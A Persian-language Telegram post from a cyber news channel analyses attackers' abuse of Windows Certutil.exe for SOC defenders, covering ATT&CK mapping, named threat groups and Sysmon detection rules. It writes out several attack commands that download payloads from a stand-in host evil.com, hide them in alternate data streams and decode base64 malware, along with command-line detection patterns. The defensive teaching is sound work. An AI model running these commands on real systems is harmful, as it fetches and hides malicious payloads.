cyber news & reference books: post #1223 — TG.ME

🛡️ تحلیل تخصصی: Certutil.exe مرتبط با پست بالا ☝️☝️☝️☝️ ابزاری که مهاجمان با آن می تونند SOC را به راحتی دور بزنند ━━━━━━━━━━━━━━━━━━━━━ ۱. بردار حمله ━━━━━━━━━━━━━━━━━━━━━ می‌خوام یه چیزی رو برتون روشن کنم که خیلی از تیم‌های SOC ازش غافل‌اند: Certutil.exe یه ابزار کاملاً قانونی مایکروسافته که روی هر ویندوزی هست برای مدیریت گواهی دیجیتال طراحی شده. ولی مهاجمان سال‌هاست دارن ازش سوءاستفاده می‌کنن چون سه تا ویژگی طلایی داره: ▸ امضای دیجیتال مایکروسافت داره —AV و EDR بهش کاملاً اعتماد می‌کنن ▸ روی تمام نسخه‌های ویندوز از پیش نصبه — نیاز به هیچ ابزار اضافه‌ای نیست ▸ می‌تونه مستقیم از اینترنت فایل دانلود کنه — بدون PowerShell، بدون curl وقتی یه مهاجم به شبکه نفوذ کرده، به‌جای اینکه یه ابزار مشکوک آپلود کنه و ریسک شناسایی رو بپذیره، از همین certutil استفاده می‌کنه. من چند تا Command رو می‌ذارم که باید حتماً روی سیستم‌هاتون دنبالشون بگردید: ▸ دانلود مستقیم Payload: certutil.exe -urlcache -f https://evil.com/shell.exe %TEMP%\shell.exe ▸ رمزگشایی فایل مخرب Base64: certutil.exe -decode encoded.txt malware.exe ▸ مخفی کردن Payload در Alternate Data Stream: certutil.exe -urlcache -f https://evil.com/a.ps1 C:\legit.txt:hidden.ps1 ▸ دور زدن Application Allowlisting: certutil.exe -verifyctl -f https://evil.com/payload.exe یه آمار مهم : طبق گزارش CrowdStrike 2025، در ۷۹٪ از حملات سال ۲۰۲۴ هیچ بدافزار سنتی استفاده نشده. LOLBins الان در ۱۷٪ از تمام تحقیقات امنیتی Q3-2025 دیده می‌شه — این عدد فقط در یه سال از ۱۳٪ رشد کرده. این یعنی تهدید داره بزرگ‌تر می‌شه، نه کوچک‌تر. ━━━━━━━━━━━━━━━━━━━━━ ۲. نگاشت MITRE ATT&CK ━━━━━━━━━━━━━━━━━━━━━ وقتی این تکنیک رو روی MITRE ATT&CK Map می‌کنم، به این Technique هامی‌رسم: ▸ T1105 — Ingress Tool Transfer دانلود مستقیم Payload با -urlcache -f ▸ T1140 — Deobfuscate/Decode Files رمزگشایی فایل‌های Base64 با -decode ▸ T1027.013 — Encrypted/Encoded File مهاجم Payload رو قبل از دانلود رمز می‌کنه تا از بازرسی محتوا فرار کنه ▸ T1564.004 — Hide Artifacts: NTFS File Attributes ذخیره Payload در Alternate Data Stream — جایی که اکثر ابزارها نمی‌بیننش ▸ T1218 — System Binary Proxy Execution اجرای کد مخرب از طریق یه باینری که مایکروسافت امضاش کرده این تکنیک رو گروه‌های APT زیرتا حالا استفاده کردن: • APT28 (Fancy Bear روسیه) • Billbug چین (هدف: سازمان‌های دولتی آسیا) • FIN7 • باج‌افزار Black Basta ━━━━━━━━━━━━━━━━━━━━ ۳. شاخص‌های آلودگی (IoCs) ━━━━━━━━━━━━━━━━━━━━━ یه نکته خیلی مهم اینجا هست که باید بدونید: Certutil هیچ Hash ثابتی برای شناسایی نداره — چون خود باینری ویندوزه. پس شناسایی باید کاملاً رفتاری باشه، نه مبتنی بر Hash. Command Line هایی که باید در لاگ‌هاتون دنبالشون بگردید: certutil.exe -urlcache -f http* certutil.exe -urlcache -f https* certutil.exe -decode * certutil.exe -verifyctl -f http* certutil.exe * -split * مسیرهای خروجی مشکوک: %TEMP%\*.exe %APPDATA%\*.exe C:\Users\*\Downloads\*.exe هر مسیری که شامل کاراکتر : باشه (Alternate Data Stream) یه چیز که من همیشه روش تأکید می‌کنم: فرآیند والد (Parent Process) رو نگاه کنید. اگر certutil.exe از این فرآیندها فراخوانی شده باشه، باید فوراً Alert بده: • outlook.exe • winword.exe / excel.exe • iexplore.exe / msedge.exe • mshta.exe ━━━━━━━━━━━━━━━━━━━━━ ۴. چرا SOC معمولی این رو از دست می‌ده ━━━━━━━━━━━━━━━━━━━━━ مشکل اصلی اینه که certutil.exe یه ابزار کاملاً مشروعه. اگه تیم SOC فقط روی Hash فایل یا Signature بدافزار تکیه کنه، این حمله رو اصلاً نمی‌بینه. تنها راه تشخیص، تحلیل رفتاری (Behavioral Analysis) هست. Event هایی که باید حتماً Monitor کنید: 🔍 Sysmon Event ID 1 (Process Create) فیلد: CommandLine شرط Alert: certutil.exe همراه با (-urlcache، -decode، -verifyctl) مهم‌تر: اگه ParentImage یکی از {outlook.exe, winword.exe, excel.exe, mshta.exe} بود → Alert فوری حتی بدون آرگومان مشکوک 🔍 Sysmon Event ID 3 (Network Connection) شرط Alert: Image = certutil.exe AND DestinationPort ∈ {80, 443, 8080} → هر اتصال شبکه از certutil باید Alert بشه. نقطه. 🔍 Sysmon Event ID 11 (File Create) شرط Alert: Image = certutil.exe AND فایل خروجی با پسوند (.exe، .dll، .ps1، .bat، .vbs) 🔍 Sysmon Event ID 15 (FileCreateStreamHash) شرط Alert: هر Alternate Data Stream که certutil ساخته

July 25, 2026 71 3